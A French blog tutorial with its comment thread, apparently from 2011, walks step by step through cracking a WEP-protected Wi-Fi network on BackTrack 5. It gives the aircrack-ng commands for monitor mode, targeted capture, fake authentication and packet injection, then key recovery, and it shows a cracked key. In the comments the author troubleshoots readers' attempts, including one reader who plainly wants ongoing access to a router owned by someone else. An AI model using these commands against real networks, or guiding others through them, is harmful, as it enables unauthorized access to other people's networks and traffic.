Skip to content
2011/06/16 / vpourchet

Backtrack 5 : Cracker un réseau Wifi protegé par clé WEP

Voici comment procéder pour cracker un réseau Wifi protegé par clé WEP. Pour commencer une capture de la config de notre routeur (linksys WRT54GL) du réseau que nous allons essayer de cracker.

    Nous passons maintenant notre adaptateur Wifi en mode monitor via la commande :

# airmon-ng start wlan0

    Le mode monitor est maintenant activé sur l’interface mon0. Nous scannons maintenant les réseaux via la commande :

# airodump-ng –write <fichier de sauvegarde> <interface>

    Nous obtenons ainsi :

    Certaines informations ont évidemment étés masquées En gros :

  • la partie supérieure liste les AP ou Access points wifi, avec principalement leur adresse mac, le SSID, et la méthode de chiffrement.
  • la partie inférieure liste les stations connectées aux AP.

Dans cet article nous nous intéressons à AP dont le SSID est : H@cKinG_Cr0wD. Nous entrons donc la commande :

# airodump_ng –write <fichier de sortie> — bssid <adresse mac du point d’acces> <interface>

Le scan se limite maintenant à la cible définie.

Le but est de collecter le plus de Datas (colonne #Data) possibles, or vous le constaterez surement, cela n’avance pas très vite, d’où l’utilité de la compatibilité du dongle avec l’injection de paquets. Nous allons donc utiliser l’injection pour booster un peu le trafic. On commence par tester une fausse authentification sur le réseau dans un nouveau terminal via la commande : # aireplay-ng -1 0 –e <ESSID du réseau wifi> -a <adresse mac de l’AP> -h <adresse mac de la station> <Interface>

Puis dans ce même terminal nous entrons la commande d’injection de paquets :

# aireplay-ng -3 -e <ESSID du réseau wifi> -b <adresse mac de l’AP> -h <adresse mac de la station> <interface>

Le nombre de datas devrait croitre rapidement.

Une fois un nombre conséquent atteint, et depuis un nouveau terminal, on lance la commande :

# aircrack-ng –x *.cap

Dans la liste affichée, on choisit l’identifiant de notre réseau.

Il ne nous reste plus qu’à patienter.

Il faut collecter un certain nombre d’IVS pour que l’attaque réussisse, patience donc.

Finalement après un certain temps :

    La clé : 496F313E33672724695A406132 est trouvée !

23 commentaires

Laisser un commentaire
  1. Anonyme / Oct 23 2011 22:31

    Super tuto, merci beaucoup.

    • vpourchet / Déc 6 2011 23:51

      De rien.

      Cordialement,

      V

  2. Anonyme / Jan 16 2012 18:39

    MERCIE MEC

    • vpourchet / Mar 9 2012 19:43

      De rien.

      V.

  3. Slipknotinfr / Fév 6 2012 20:15

    Quel tool utiliser svp ?

    • vpourchet / Mar 1 2012 08:03

      Ceux décrits dans l’article.

      Cordialement,

      V

  4. bico / Fév 9 2012 19:23

    merci nickel clair

    • vpourchet / Mar 1 2012 07:55

      De rien.

      V

  5. michima / Mar 23 2012 13:02

    arrivé sur cette ligne de commande « # aireplay-ng -3 -e -b -h  » voici le message qui s’affiche :

    « mon1 is on channel 1, but the AP use channel 10  »

    que faire svp

    merci d’avance

    • vpourchet / Avr 29 2012 10:32

      Bonjour,

      Le channel doit etre spécifié dans le airmon.

      Cordialement,

      V

  6. nicky larson / Avr 9 2012 00:55

    merci pr c tt !!!

    • vpourchet / Avr 12 2012 22:14

      De rien :)

      V

  7. ismael / Avr 17 2012 04:54

    slt peut tu me dire ce quoi « -h  » (aireplay-ng -3 -e -b -h ) a cette étape peut ton utilise cette commande « aireplay-ng -1 0 -a (bssid) mon0 »

    • vpourchet / Mai 15 2012 00:23

      -h smac : set Source MAC address

      l’option -h permet de fixer l’adresse MAC source. on peut l’utiliser en plus du BSSID je suppose (si SSID identiques multiples) pour affiner le aireplay, dans les autres cas ce n’est pas nécessaire à mon avis.

      Cordialement,

      V

  8. Anonyme / Avr 18 2012 16:53

    comment booter mn pc avec BC 5 ?

    • vpourchet / Avr 29 2012 10:18

      Bonjour,

      En l’installant sur une partition ou via un DVD bootable.

      Cordialement,

      V

  9. alex clusifs / Avr 24 2012 05:09

    doit on creer le fichier de sortie avent de commencer ou en passantla comande ca vas se creer tiout seul ( desole mais je commence tout juste a m,interesser a linux et je n,y connais pas grand chose encore .. ) merci a l’avance …!

    • vpourchet / Avr 29 2012 10:20

      Bonjour,

      Le fichier sera créé s’il n’éxiste pas.

      Cordialement,

      V

  10. medin / Mai 3 2012 13:21

    Bonjour,
    j’ai un accès à un routeur wifi de type SMC, parfois(quand il n’est pas sécurisé) , mais pas tout le temps, donc j’ai entrez sur l’adresse de ce routeur lorsqu’il était non sécurisé, et j’ai trouvé toute les donnés (SSID, MAC, …) je sais pas s’il y as une méthode pour que j’aurait toujours un accès à ce routeur meme lorsque son propriétaire le rend sécurisé. Ou bien existe-il des donnés que je peux avoir lorsque le routeur n’est pas sécurisé que je peux récupéré depuis l’interface admin du routeur et qui seront utile pour connaitre le mot de passe lorsqu’il sera sécurisé?

    merci

    • vpourchet / Mai 15 2012 00:11

      Bonjour,

      Si vous avez acces à la config du routeur vous devriez voir la clef de cryptage wifi non ? a moins qu’elle ne soit cryptée dans l’interface ?

      Cordialement,

      V

  11. Anonyme / Mai 10 2012 21:50

    Bonsoir,

    pour generer du traffic jai donc suivi la procedure # aireplay-ng -1 0 –e -a -h

    mais il me met en derniere ligne mon0 is on channel 1, but the AP uses channel 6

    comment procédé SVP
    Merci d’avance.

    • vpourchet / Mai 15 2012 00:06

      Bonjour,

      Comme indiqué dans les commentaires une erreur s’est glissée au niveau du tuto, la bonne méthode est de lancer le airmon sur le meme channel que l’AP en utilisant l’option –channel si ma mémoire est bonne. Dans votre cas il faut ajouter au airmon l’option –channel 6

      Cordialement,

      V

Trackbacks

  1. Backtrack 5 : Cracker un réseau Wifi protegé par clé WEP | Admin Reso

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s

%d blogueurs aiment cette page :